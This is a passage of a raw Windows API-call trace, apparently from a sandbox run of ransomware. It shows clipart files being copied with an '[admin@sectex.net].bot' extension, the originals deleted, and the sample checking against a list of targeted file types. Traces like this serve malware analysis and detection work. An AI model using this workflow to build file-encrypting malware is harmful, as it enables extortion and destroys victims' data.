	[0153.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.687] GetLastError () returned 0x0
	[0153.687] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xe16, lpOverlapped=0x0) returned 1
	[0153.803] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe20, lpOverlapped=0x0) returned 1
	[0153.804] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.804] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.804] SetEndOfFile (hFile=0x31c) returned 1
	[0153.804] CloseHandle (hObject=0x31c) returned 1
	[0153.804] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.804] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.806] CloseHandle (hObject=0x3e8) returned 1
	[0153.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf")) returned 1
	[0153.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.807] lstrlenW (lpString=".doc") returned 4
	[0153.807] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.807] lstrlenW (lpString=".docx") returned 5
	[0153.807] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0153.807] lstrlenW (lpString=".pdf") returned 4
	[0153.807] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.807] lstrlenW (lpString=".xls") returned 4
	[0153.807] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.807] lstrlenW (lpString=".xlsx") returned 5
	[0153.807] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0153.807] lstrlenW (lpString=".ppt") returned 4
	[0153.807] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.807] lstrlenW (lpString=".zip") returned 4
	[0153.807] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.808] lstrlenW (lpString=".rar") returned 4
	[0153.808] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString=".bz2") returned 4
	[0153.808] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString=".7z") returned 3
	[0153.808] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.808] lstrlenW (lpString=".dbf") returned 4
	[0153.808] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.808] lstrlenW (lpString=".1cd") returned 4
	[0153.808] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.808] lstrlenW (lpString=".jpg") returned 4
	[0153.808] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.808] lstrlenW (lpString=".doc") returned 4
	[0153.808] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString=".docx") returned 5
	[0153.808] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0153.808] lstrlenW (lpString=".pdf") returned 4
	[0153.808] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.808] lstrlenW (lpString=".xls") returned 4
	[0153.808] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.808] lstrlenW (lpString=".xlsx") returned 5
	[0153.808] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0153.808] lstrlenW (lpString=".ppt") returned 4
	[0153.808] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.809] lstrlenW (lpString=".zip") returned 4
	[0153.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.809] lstrlenW (lpString=".rar") returned 4
	[0153.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.809] lstrlenW (lpString=".bz2") returned 4
	[0153.809] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.809] lstrlenW (lpString=".7z") returned 3
	[0153.809] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.809] lstrlenW (lpString=".dbf") returned 4
	[0153.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.809] lstrlenW (lpString=".1cd") returned 4
	[0153.809] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned 63
	[0153.809] lstrlenW (lpString=".jpg") returned 4
	[0153.809] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.809] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.809] lstrlenW (lpString="J0099190.JPG") returned 12
	[0153.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.824] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=43892) returned 1
	[0153.824] CloseHandle (hObject=0x3e8) returned 1
	[0153.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg")) returned 0x20
	[0153.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.825] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.825] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.826] GetLastError () returned 0x0
	[0153.826] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xab74, lpOverlapped=0x0) returned 1
	[0153.829] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xab80, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xab80, lpOverlapped=0x0) returned 1
	[0153.830] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.830] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.830] SetEndOfFile (hFile=0x31c) returned 1
	[0153.831] CloseHandle (hObject=0x31c) returned 1
	[0153.831] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.831] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.833] CloseHandle (hObject=0x3e8) returned 1
	[0153.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg")) returned 1
	[0153.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.834] lstrlenW (lpString=".doc") returned 4
	[0153.834] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.834] lstrlenW (lpString=".docx") returned 5
	[0153.834] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0153.834] lstrlenW (lpString=".pdf") returned 4
	[0153.834] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.834] lstrlenW (lpString=".xls") returned 4
	[0153.834] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.834] lstrlenW (lpString=".xlsx") returned 5
	[0153.834] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0153.834] lstrlenW (lpString=".ppt") returned 4
	[0153.834] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString=".zip") returned 4
	[0153.835] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.835] lstrlenW (lpString=".rar") returned 4
	[0153.835] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.835] lstrlenW (lpString=".bz2") returned 4
	[0153.835] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.835] lstrlenW (lpString=".7z") returned 3
	[0153.835] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString=".dbf") returned 4
	[0153.835] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString=".1cd") returned 4
	[0153.835] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString=".jpg") returned 4
	[0153.835] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.835] lstrlenW (lpString=".doc") returned 4
	[0153.835] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.835] lstrlenW (lpString=".docx") returned 5
	[0153.835] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0153.835] lstrlenW (lpString=".pdf") returned 4
	[0153.835] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.835] lstrlenW (lpString=".xls") returned 4
	[0153.835] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.835] lstrlenW (lpString=".xlsx") returned 5
	[0153.835] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0153.835] lstrlenW (lpString=".ppt") returned 4
	[0153.836] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.836] lstrlenW (lpString=".zip") returned 4
	[0153.836] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.836] lstrlenW (lpString=".rar") returned 4
	[0153.836] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.836] lstrlenW (lpString=".bz2") returned 4
	[0153.836] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.836] lstrlenW (lpString=".7z") returned 3
	[0153.836] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.836] lstrlenW (lpString=".dbf") returned 4
	[0153.836] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.836] lstrlenW (lpString=".1cd") returned 4
	[0153.836] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 63
	[0153.836] lstrlenW (lpString=".jpg") returned 4
	[0153.836] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.836] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.836] lstrlenW (lpString="J0099191.JPG") returned 12
	[0153.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.837] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=62367) returned 1
	[0153.837] CloseHandle (hObject=0x3e8) returned 1
	[0153.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg")) returned 0x20
	[0153.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.837] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.837] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.838] GetLastError () returned 0x0
	[0153.838] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xf39f, lpOverlapped=0x0) returned 1
	[0153.841] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xf3a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xf3a0, lpOverlapped=0x0) returned 1
	[0153.843] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.843] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.843] SetEndOfFile (hFile=0x31c) returned 1
	[0153.843] CloseHandle (hObject=0x31c) returned 1
	[0153.843] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.843] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.846] CloseHandle (hObject=0x3e8) returned 1
	[0153.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg")) returned 1
	[0153.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.847] lstrlenW (lpString=".doc") returned 4
	[0153.847] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.847] lstrlenW (lpString=".docx") returned 5
	[0153.847] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0153.847] lstrlenW (lpString=".pdf") returned 4
	[0153.847] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.847] lstrlenW (lpString=".xls") returned 4
	[0153.847] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.847] lstrlenW (lpString=".xlsx") returned 5
	[0153.847] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0153.847] lstrlenW (lpString=".ppt") returned 4
	[0153.847] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.847] lstrlenW (lpString=".zip") returned 4
	[0153.848] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.848] lstrlenW (lpString=".rar") returned 4
	[0153.848] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.848] lstrlenW (lpString=".bz2") returned 4
	[0153.848] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.848] lstrlenW (lpString=".7z") returned 3
	[0153.848] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString=".dbf") returned 4
	[0153.848] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString=".1cd") returned 4
	[0153.848] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString=".jpg") returned 4
	[0153.848] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString=".doc") returned 4
	[0153.848] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.848] lstrlenW (lpString=".docx") returned 5
	[0153.848] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0153.848] lstrlenW (lpString=".pdf") returned 4
	[0153.848] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.848] lstrlenW (lpString=".xls") returned 4
	[0153.848] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.848] lstrlenW (lpString=".xlsx") returned 5
	[0153.848] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0153.848] lstrlenW (lpString=".ppt") returned 4
	[0153.848] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.848] lstrlenW (lpString=".zip") returned 4
	[0153.849] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.849] lstrlenW (lpString=".rar") returned 4
	[0153.849] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.849] lstrlenW (lpString=".bz2") returned 4
	[0153.849] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.849] lstrlenW (lpString=".7z") returned 3
	[0153.849] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.849] lstrlenW (lpString=".dbf") returned 4
	[0153.849] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.849] lstrlenW (lpString=".1cd") returned 4
	[0153.849] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 63
	[0153.849] lstrlenW (lpString=".jpg") returned 4
	[0153.849] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.849] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0153.849] lstrlenW (lpString="J0099192.GIF") returned 12
	[0153.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.850] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17964) returned 1
	[0153.850] CloseHandle (hObject=0x3e8) returned 1
	[0153.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif")) returned 0x20
	[0153.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.850] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.850] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
